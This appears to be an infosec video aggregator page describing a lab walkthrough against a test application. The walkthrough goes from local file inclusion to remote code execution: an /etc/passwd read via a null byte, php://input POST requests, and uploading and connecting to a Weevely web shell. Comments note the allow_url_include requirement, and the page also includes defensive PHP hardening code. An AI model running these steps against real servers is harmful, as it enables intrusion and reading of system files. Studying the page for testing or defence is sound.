Description: From LFI to remote code execution with a php://input POST request (super veda2012 test application):
Tools:
Netdiscover
nmap
Burp Suite
Weevely tiny web shell
Firefox
Attacker IP address: 192.168.42.130
netdiscover -r 192.168.42.0
nmap -sS -sV -p 80 192.168.42.132
firefox 192.168.42.132
192.168.42.132/pressreleases/showPressRelease.php?releaseID=/etc/passwd%00
Open Burp Suite.
Use Repeater to send the POST request:
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1
Create the PHP shell:
cd /pentest/web/backdoors/weevely/
./weevely.py generate mypass /var/www/shell.txt
Upload the shell with a Burp POST request:
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1
Connect to the shell:
./weevely.py http://192.168.42.132/pressreleases/shell.php mypass
apache@localhost.localdomain:/var/www/html/pressreleases$ ls
1.php
2.php
3.php
default.php
index.php
shell.php
showPressRelease.php
thumbs
apache@localhost.localdomain:/var/www/html/pressreleases$
Tags: php, weevely, shell, lfi, nmap, burp suite
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Great video, thanks for sharing... Excellent demonstration.
Thanks a lot.
Are there any configuration requirements (I mean PHP or web server configuration) besides having a script with an LFI vulnerability to run the code from a POST request using this php://input method? I tried this on XAMPP, but it's somehow hardened.
So, I told myself to try harder, and now it works.
It requires:
1. setting allow_url_include to On in php.ini
2. on a Windows environment it will be php://input (without the null byte, because with the null byte it doesn't work).
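The walkthrough in the description and the configuration point in the comment above come down to the same thing: showPressRelease.php passes releaseID straight into include(), so a local path with a null byte reads /etc/passwd, and php://input (only when allow_url_include is On) executes the POST body. The following is an added illustration, not the test application's or the video's code; the directory layout, the `.php` suffix, and the function names are assumptions. It shows the vulnerable shape beside a hardened version that treats releaseID as an opaque numeric identifier and confines the resolved path to the press-release directory.

```php
<?php
// Added illustration (not the super veda2012 application's code).
// Assumption: press releases live as <n>.php in this directory, matching the
// 1.php, 2.php, 3.php listing seen through the web shell.
const RELEASE_DIR = __DIR__ . '/pressreleases';

// Vulnerable shape: the request parameter reaches include() unchanged, so
// "/etc/passwd%00" (on PHP versions that truncate at a null byte) reads a
// local file and "php://input" executes the POST body when
// allow_url_include=On.
function showReleaseVulnerable(string $releaseId): void
{
    include $releaseId . '.php';
}

// Hardened resolution:
// 1. accept only a short positive integer (no slashes, dots, colons or NULs);
// 2. build the path server-side with a fixed directory and extension;
// 3. require realpath() to resolve inside RELEASE_DIR, which rejects
//    traversal and never resolves stream wrappers such as php://input.
function releasePath(string $releaseId): ?string
{
    if (!preg_match('/^[1-9][0-9]{0,5}\z/', $releaseId)) {
        return null;
    }
    $base = realpath(RELEASE_DIR);
    $candidate = realpath(RELEASE_DIR . '/' . $releaseId . '.php');
    if ($base === false || $candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

function showReleaseHardened(string $releaseId): void
{
    $path = releasePath($releaseId);
    if ($path === null) {
        http_response_code(404);
        echo 'No such press release.';
        return;
    }
    include $path;
}

// Defence in depth: with allow_url_include=Off (the PHP default) a reachable
// include() still cannot pull in php://input or remote URLs. Log loudly if
// the process is running with the unsafe setting.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is On: php://input includes are possible');
}

showReleaseHardened($_GET['releaseID'] ?? '');
```

Requests such as releaseID=/etc/passwd%00 or releaseID=php://input%00 fail the integer check before any filesystem call is made, and the realpath() containment catches anything that slips past a future change to the validation. The ini check is independent of the code fix: keeping allow_url_include Off is what makes the php://input trick from the comment stop working regardless of the application.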
Cool, thanks for the info, and sorry for the late response.